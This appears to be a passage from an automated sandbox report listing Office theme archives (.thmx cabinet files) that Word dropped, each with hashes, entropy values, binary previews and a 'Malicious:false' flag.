                                                                                      Preview:MSCF............D................................D..........~..................M. .content.inf............M. .Dividend.thmx..).}.b..[.....`.........?.R...T../..............4..yy....{...f.h..\U......sy.gV0Q.@..A..@..3a.A}........7.q.......8......R....sJ)E..ENr.S*B.1..).s.r.J.D.b."..........(.....E$.V........y.5.L....;gY..QK/nni..x..3.<..Q.Q..K.I.....T.z.,F.....{.p.....;8._.&../...........X...}.;[Gk..._.i`m.u.?...s.w...4.....m......l....5..n.?..c..m...,.....{.k.?......sC.............e..1....oL.8./......1._.K:.]..&......O............qo.....Dd/c...6.q.*......V.v........h....L..h..C+..V..;O.(7Z]{I%....S3.{h....\...b.......5.ES......Z.4...o.c`..YA....9i....M.s....Z3.oq`....>.i..@.@n.a...x.3.zp.<....vU/.|^CvE...aD.P&mhvM>.p..B~....."._.......v-.m..w..?._..=...:...k....i.}x.6....Y.i..n....h...j......LZ.....fk..f0.y.T..Vl.;...s.......B6.f.'z.c.\W?...4U)..aJ.;O....L.d7.J.V#Q.....\J.F.?].d}!..y].6..%..~....|......5...'N.#.....t6.,.E.O."..0fyz....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):271273
                                                                                      Entropy (8bit):7.995547668305345
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:zfdvQnJMwXse4Vradf3mrC7woyWbjKlCVC7K:zfJwJse4VrS1AK
                                                                                      MD5:21437897C9B88AC2CB2BB2FEF922D191
                                                                                      SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                                                                                      SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                                                                                      SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                                                                                      Malicious:false
                                                                                      Preview:MSCF....Q.......D...............y...........Q...XJ..........{..................M.. .content.inf.(..........M.. .Frame.thmx.1....b..[.........B.....6....ZZ}....BH..-D..}..V.V-........Z..O.....H.f..........;..@d.`......!..=;.,bp..K.q....s.y....D.qZ)p......D...r.S....s=B.4.).8B....4.a6 ...~........."....#.....}....n.Q.1cH.%c/.U....E..E...!..Da*.p....X..G..:.....1.@.....W.'...._........W.c...<.v.k.....&.8......?.h.>d._:-.X.......9..tL}........3.;.N3.D~......>.^?..|:...}......oT.z.......w..[..}:...._fu........Kk.......L..9..p..e..^......K.%...Mapqhvv..E&.^.....[...9|"l...9...U......!..w..Nya...~C.yx...w.K..q.z.j.W?t.......DY.x.S2.....]..na.Qj...X.K..^...S.hK.W...Z....s.0...NF...8C.......j.'Zc...k.%...l....S.....OW..o.Qf.x...X.;<.rO].....W.m.e....T.1.6........".....Q.3........l..v.."..I...&......w..4vE...c.s[.3.m..8.q$.....a...)...&:6..,..#..?....;.!.....~.UP.r=.}h.&U......X...]..X.e\u.G<....E....lG.@.*Z...10.D@.]....z+-.S....p..Y.PK.:.S..p.....1E`..-
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):230916
                                                                                      Entropy (8bit):7.994759087207758
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1a72rLiQxEBTR:750nz63/FJRFLISnp+Bt
                                                                                      MD5:93FA9F779520AB2D22AC4EA864B7BB34
                                                                                      SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                                                                                      SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                                                                                      SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                                                                                      Malicious:false
                                                                                      Preview:MSCF.....F......D................g...........F...?..........|..................L.. .content.inf.zG.........L.. .Parcel.thmx.>2...R..[...0...........7....B+...BH....{...^.../.....B{...1....+".....<.....$........{.......sD"..j...}... P..w..U..f...6.x8. ...C..F.q.7....T.6p......B.P..L..g......A..43.W`.....{{...u.4...:.bb.4"X..m..)$..@(H. H.tBPTF..,.&.B.'...6..2...n..c%...Z@.(.@.......(.<i.i....P......?......o.......F.M.L......i.....C..7..../.....MQ.0..l.U.s.Fu.......1...p.;.(.}..ogd..<.._.Z......._.......O.J......97...~<...4.c....i..........'k.5.......Q.$..C..E... ..5.7....N.a.[ns6hi..kM....?....X......*9q...!O\....0....n.^s.9.6..............;. ..r...rf..C6z..v #.H...O...v/.sl....J.m%.L.Dp.e....*uO..g.y....f...].5.*........W.....h^[..w.|.=.ru.|.M..+.-.B...D.Ma....o.<X SnI....l...{..G..,..y5\W.@..y.;.y ...M..l.....e..A...d.e!.E..3.......k1.......6gY).../....pQ..?..s.W.)+R.S5..../.0..vz.^.......k.....v..9..A.NG...N~#..$.B...*s,(.o.@.ar.!.J.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):261258
                                                                                      Entropy (8bit):7.99541965268665
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                                                                                      MD5:65828DC7BE8BA1CE61AD7142252ACC54
                                                                                      SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                                                                                      SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                                                                                      SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                                                                                      Malicious:false
                                                                                      Preview:MSCF............D...............nJ...............D.................."..........M. .content.inf....."......M. .Metropolitan.thmx...cVtP..[.....`Q..B.....=.T.....h.."...Z..|..}hZK.V....Z..Z................?..v...[S$."...H......^u.%.@...>....... f.........1.5......*&lm.tZ.msz:...Noc....1....D .........b..... ..3#pVp....}oo]{m......H*[%i.GNHB1D<......(*# ....H"....DP..b(B.<.....v......_..`.7..;.}............/.p}.:vp....~l0..].........S....G?.....}..U.;......dNi..?........-c..J.z....Z...._.O.....C..o.,......z....F....sOs$..w9......2G..:@...'....=.....M..am.....S......(`.._....'......[..K"....BD...D...^1k.....xi...Gt....{k@.W.....AZ+(,...+..o......I.+.....D..b. T.:..{..v.....g..........L.H.`...uU~C.d...{...4.N.N..m8..v.7..3.`.....,...W...s.;.fo.8.Y...2.i...T&.-...v8..v.U.Y=...8..F.hk..E.PlI.t.8......A.R....+.]lOei..2...... gS*.......%8H.....<.U.D..s.....>.....D_...../....l.......5O1S~.........B.g.++cV.z.f .R.Z.......@6....(..t^5"...#G...
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):295527
                                                                                      Entropy (8bit):7.996203550147553
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                                                                                      MD5:9A07035EF802BF89F6ED254D0DB02AB0
                                                                                      SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                                                                                      SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                                                                                      SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                                                                                      Malicious:false
                                                                                      Preview:MSCF.....B......D...............P............B..p?..........{.................M.. .Basis.thmx...........M.. .content.inf.`g..td..[...............5..$..WM.....R.......H\.+\./^...x.^..h..MU..\........v........+......g...$.......g.....~....U].7..T..1k.H...1...c.P.rp.6K..&......,.............U4.WoG.w.....;.....v..922.;]..5_-]..%E]b..5]... (..H..II..ttA4Q..BI!|...H.7J.2D....R.......CXhi`n....6..G.~&.[..N...v..Z"t.a..K..3..).w...._@.}.}.v.......4......h....R;.8.c&.F...B^....Q.....!Bm2...F.`.......M;...#.{....c...?...e...6t..C.-.E.V.v%I..H.....m.n...$D.....vU'.....=6}~...Gw...Y..?.@......G.....k......z...5d.h......1.}..O*;e..t......Y.0...3.v).X.-.2.....~....14.[.w=I....hN....eD..7G.u.z..7.do..!....d..o.wQ.:....@/.^..<e.-..=\.....6.C.'.rW$..Cp.M3.u6z......Q.F.9.5....juc..I...m4]7L....+n......).t......2[.3.p.:.....O5y..wA........^..!..H....{..S.3w.!&.'.;...(..|m.x.S..Z.j..3...n..WU...../w.......xe=.+.D...x..qy.S.....E..... ...uu.`.,..<.6[p
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):550906
                                                                                      Entropy (8bit):7.998289614787931
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                                                                                      MD5:1C12315C862A745A647DAD546EB4267E
                                                                                      SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                                                                                      SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                                                                                      SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                                                                                      Malicious:false
                                                                                      Preview:MSCF....*#......D...............Q...........*#...D..........~..................M{. .content.inf............M{. .Parallax.thmx.9... y..[......(..b.P...E.Q*.R.".RTH.%.T..F......u.{.*+.P.....FK*0].F...a{...D4`D..V.../.P,....2.Mx...u......0...E...{A-"J...)jl_.A..T......u.Y....ZG:....V.A.#~.. ..6..............o..X..<.... .......C.ce.f!nA.).p...p........n..................'6w6H6s.j....l...{?.h..........]..l.....v....%..l}A..................3...W_73.j......6...F.../..qG.?........H..).........7.&km....`m2..m.W.q.<../~<..6*.78..X~.e+..CC*w...T...6....AB..l..._.f......s.e....2....H..r.R.Z....a.,..\Q.q..._SJJ....7.S.R....=f..>....9=....NnC.....].-...\..Z..q..j...q.....Nj..^'..k...Zl.~PRvpz.J..+.C...k.z.w=l.#.............n...C..s.kM.@B{..vL.e....E..(/......f...g..=..V...}...).=s.....y!.,...X.[..[.....\31}..D%...%..+G66.j.v./.e9...P;.o.y..U+...g.g.S.../..B._L..h...Oi.._...:..5ls>>........n6.F.Q..v>..P.r:.a..Z....a...x..D....N...i..=L.u......<;Nv.X/*.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):640684
                                                                                      Entropy (8bit):7.99860205353102
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                                                                                      MD5:F93364EEC6C4FFA5768DE545A2C34F07
                                                                                      SHA1:166398552F6B7F4509732E148F93E207DD60420B
                                                                                      SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                                                                                      SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                                                                                      Malicious:false
                                                                                      Preview:MSCF............D................4...............?..........~..................M. .content.inf."..........M. .Quotable.thmx..^.u.n..[...............&...U..F.......UU.M.T5.UUQS..j..#>43fD.....`....Vr......19'...P..j.-...6n.0c....4$.c....$.4.k3aQ$.lCN.#.[.."qc....,Z...,Qt@!.@...... ...H.......9.9.y.{....[.`..s3.5.....B....W.g.d...[uv.UW..............P.8.(.?......3.....'/F...0...8.P. .O..B....K...g..L.......#s...%..|4.i....?.3b.".....g...?.........2.O23..'..O~.+..{...C.n.L......3......Y.L...?K...o......g....@.]...T..sU.....<.._.<G.......Tu.U2..v.&..<..^..e.].cY;..9.%..}...I.y.;...WM...3>.:.=.|.-.AtT2OJ.I.#...#.y....A....\]$r...lM.%5.."...+7M..J.....c...".&$.... Y.r.B;..81B. +H...b....@7K.*.F.Z...v..=..ES.f.~.."...f..ho.X.E.a`~*...C>.&..@\.[....(.....h..]...9&...sd.H .1.x.2..t.rj..o..A..^qF.S9.5.....E.{...C|.w.c/V...0Q.M...........O.7;A4u...R..Z.B.7a.C`....p.z.....f!|.u.3t....2e.wWH..'7p....E_...e.._;..k....*&E.^.f=V..{*..al.y:.4a...+.g...-..>e
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):723359
                                                                                      Entropy (8bit):7.997550445816903
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                                                                                      MD5:748A53C6BDD5CE97BD54A76C7A334286
                                                                                      SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                                                                                      SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                                                                                      SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                                                                                      Malicious:false
                                                                                      Preview:MSCF....?.......D...........................?...`J..............3..............M.. .content.inf..+.........M.. .Wood_Type.thmx......r..[.........................!.wwwwqwwwwwwwwwww..."....+......nR..x..\..w..r.5R.....(|.>.$e3.!..g....f..`9NL......o./.O.bxI...7.....|........6.n."J.....4^g.........?...................o.......s3.....8. .T.j...._.Z.Q.t.k,(o.c.t.......?Z....`o........?.a....6.)....6b..../.t...........Mz....q}......C.......+{.......o...K.tQjt............7.._....O.....\....` ..............@..`....%..t....V.]........m..m....u..1.yr;..t..F.'..+{....zqvd.g._..$H..Vl...m..../....g..rG.....:*......8....h...[...a06...U.W....5.Z.W..1I..#.2.....B3...x....$PRh...\{J.c.v.y..5+Y.W.N..hG......<..F..W.d8_....c...g....p|7.]..^.o.H.[$Zj..{4......m.KZ..n.T%...4.Z..Y."q7?kuB......U....).~.......W%..!.e.U.mp.o...h...?.w...T.s.YG#......Y.}....Z.O.i.r,...n..4.\....P..m..=....f........v....g....j...*.wP..4.VK.y.z...C..oum.b.1......?.Z.>.7.!?......A..Q>..Z....-
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):698244
                                                                                      Entropy (8bit):7.997838239368002
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                                                                                      MD5:E29CE2663A56A1444EAA3732FFB82940
                                                                                      SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                                                                                      SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                                                                                      SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                                                                                      Malicious:false
                                                                                      Preview:MSCF....lh......D...............P...........lh...?..........|..................M. .Berlin.thmx............M. .content.inf..lH.lj..[...............7.I..)........P..5x.B/^y5.xk^^......D.F........s....y...?D.....*.....&....".o..pl..Q.jm?_...6......=%.p.{.)S..y...$......,4..>#.........)..."-....K....4.E...L=.......4..p.c..nQ.0..ZO.#.....e.N..`U......oS....V..X[t.E)|.h..R....$..}.{.F.7....^.....w.,...5rBR.....{.......mi...h.b......w+..;.hV......q..(.7&.Z.l...C."j........[-E4h.....v&..~.p$|\X...8.....Fj'%,.)6w...u|C..,y..E..`*Up../(....2.(....Z.....,.'...d..s..Z....5.g.?Nq..04...f...D.x....q+.b.."v`{.NL....C..... ..n......1N+.I.{W9....2r.0...BaC.....O..=...k..."..8.D\jK.B...Aj....6,B..2...I.. B..^.4..1.K+.....DP...Mr....9..x[...>........?.Zd..'._2.._..>..'.F..#.w...2..~.|........q_Wy.W.....~..Qex.km/..f......t.q..p..gm.|.x.... ,.#\Z....p....a.}...%..v.J.Es......I.b.P?...0......F.x....E..j..6.%..E..-O.k...b .^.h.Cv...Z....D.n.d:.d.F..x...[1...B..
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):1065873
                                                                                      Entropy (8bit):7.998277814657051
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                                                                                      MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                                                                                      SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                                                                                      SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                                                                                      SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                                                                                      Malicious:false
                                                                                      Preview:MSCF....q.......D...........................q... ?..........{...%..............M. .content.inf.Q_.........M. .Savon.thmx...O>.o..[..............&.5....UUcC.C....A...`TU...F....".54.E.....g.-.7-D....1g...p.6......@..w(....h'?.....(..........p..J.2n$4.........A......?...........@.C.W.R.5X..:..*..I..?....r.y..~!.....!.A.a...!........O.........5.x<C...?.?....C.C.......'....F../....../.$................4.7...................P...(.w.}6.........7.....01.1r........._..?.............'.._..JOx.CFA<.........*0..2.?...>F.../...;..6-8..4...8&yb....".1%..v'..N...x......}.gYb..~L.....f[..!......Y.G.....p..r...?.p...F.Vy.....o.Whll...+...M.V...:.]...B.%.H....n..@.].zaVxf...y{.@....V.t.W....$Kp-.....7W.J..h..0A3mK.=.ub..R...W......*'T2..G#G,.^..T..XZu...U. ...76.d..#.I.JB.v...d...%.....6..O.K.[.:.L.\.....1.D..2a.>f......X...b5...ZgN.u.f...a!..."...sx....>..?.a.3.8.^._q..JS1.E..9..Lg.n.+....lE.f:j.9)Q..H1=..<.R.......{c>:.p[..S.9h.a.gL.U....8.z..z.!.....2I.~.b..2..c...
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):953453
                                                                                      Entropy (8bit):7.99899040756787
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
                                                                                      MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                                                                                      SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                                                                                      SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                                                                                      SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                                                                                      Malicious:false
                                                                                      Preview:MSCF....]M......D...............=...........]M...?..........}..."..............Li. .content.inf............Li. .Gallery.thmx.].(.Vq..[.....0Y..........v.....w.wwwww.wwwwww.w.....".83....y8..mg...o*..U..N(..@uD.:O<........{.G....~~.....c.c.5..6./|G .@#1O.B.............PT@...b.d.~..U....B.{.........0.H.....`.H.`..'S.......Ic..W..x...z....... .........g......._....o......S......p...$....._........._...K......x..?.6.U~...'./.r.................../.......5.8..2........2b.@j ....0.........``....H... ,5...........X........|..Y.QoiW..*|.......x.sO8...Yb....7...m..b.f.hv..b......=...:Ar.-...[..A\.D..g..u....].9..M...'.R-`.....<..+.....]...1.^..I.z..W{.._....L.. ...4;..6O.....9,.-.Vt+b/$7..}.O05.Y...-..S.....$*.....1."Z.r;.!..E.mMN..s .U...P%.[.P...cU...j...h.d.../.s..N/..:..X*...p5.7\}h.Q ..._.F.X.C..z$.nV..+.k..|.@.L...&.........^#.G.a..x..w!wx.8e+..E. i..$?9..8...:......|..[."..y..&y..?...W....s..._...3Z0c.....i.q.........1c.jI....W..^%xH.._...n.......&J..
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):1097591
                                                                                      Entropy (8bit):7.99825462915052
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                                                                                      MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                                                                                      SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                                                                                      SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                                                                                      SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                                                                                      Malicious:false
                                                                                      Preview:MSCF............D...............-,..............x?..........}...-...RU.........M. .Circuit.thmx.....RU.....M. .content.inf.g...&|..[......=..R.....=.*,.!QA?h..Q.!....Uk!.HJ.......VKuk.....q.w.w.U.....;...K.@.URA..0..B..|rv.ND(.`{..@.1.}...s?.....-...O.(V.w..1..a.....aW...a.Z..aX....5.I...!..........(. ./.d...me.( ..f.........w.......Xp.s....c..vB.98.....C.J......V ..ML.M...B.n.>...|....u!.5@t..q4....(K...u qL.S....>/%v%.2..TF.].e..'..-..L.N..c].a..(WU\o.%^..;...|o.6..L..[..;&....^p.Lu.sr,-.R=.:.8.>VOB...:.?$.*h.o....Zh.h....`.B.c.../K......b^...;2..bY.[.V.Q8....@..V7....I0c.cQN7..I.p..}..!..M....1K....+....9.2......a..W.V..........;.J .i......]%O.-......CeQ.0.c....MbP3.0.w..8w..Y...|...H;#.J.+M......>.`y..aWk|.i.BF.pJv;.....S..6....F.....RLG~..........J.=......"..........H.....h..o...u........M.6F?.F.p.B.>./*l....J.R..#P.....K......<iu..gm^..n...#c..zO"7M.O......4'>A..(.E.Cy.N.)....6.tx.r[.....7.......m.t..E?.....5.5.6.\..{.V.T.D.j..=~a^.I
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):1310275
                                                                                      Entropy (8bit):7.9985829899274385
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                                                                                      MD5:9C9F49A47222C18025CC25575337A965
                                                                                      SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                                                                                      SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                                                                                      SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                                                                                      Malicious:false
                                                                                      Preview:MSCF...........D...............9..............XJ..........}...6..............M.. .content.inf............M.. .Droplet.thmx..m7.>J..[...............2.QQPIj.*.."o^R.H5*^...^(e.W...R..x..^`..m...."..+.....{o.......Q.-....$V.N>...T]..L.... ..N.h..dOY.......S......N.%.d..d....Y.....e..$...<.m...`............@....=.z..n..[...,G..1Fn.qPDH{C<...3.Q...2..r..*...E.E.E.ErM"&a..'..W....:...?I..<.I..6o.`.d.?!..!..._.4\.._.E..).._O.S....; ..#..p.H.....c....o\.K..?$U.e.........!...J.v.....gNe._..[....#A.O.n_.....gm:P._.........{@..-g..j.69b.NH.I.$Hk?.6.n...@......'.C.._.U..:*,j.-G.....e.#.Sr.t.L......d[.[...s.....rx.3.F[.5o..:....K*.x..)M.fb...3IP.&h.Q.VX^%U.......x..l......@6.k.P..zSW.?....F..[L...4..b.l.w."&.....`.j...i.5}".~.-.....{\.:...o.'H\*+)....3.Y......\...f:.;....e........4't7..f...w..j...3....N..9`.J...P..?.....=3_.y]...f.<.......JM5.}Q/ .F.a..Z.._yh......V..>m .......a....f....!.hz..\.....F_..'z...,....h.=.......=.o..T....3.e..........$..g.2.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):1881952
                                                                                      Entropy (8bit):7.999066394602922
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
                                                                                      MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                                                                                      SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                                                                                      SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                                                                                      SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                                                                                      Malicious:false
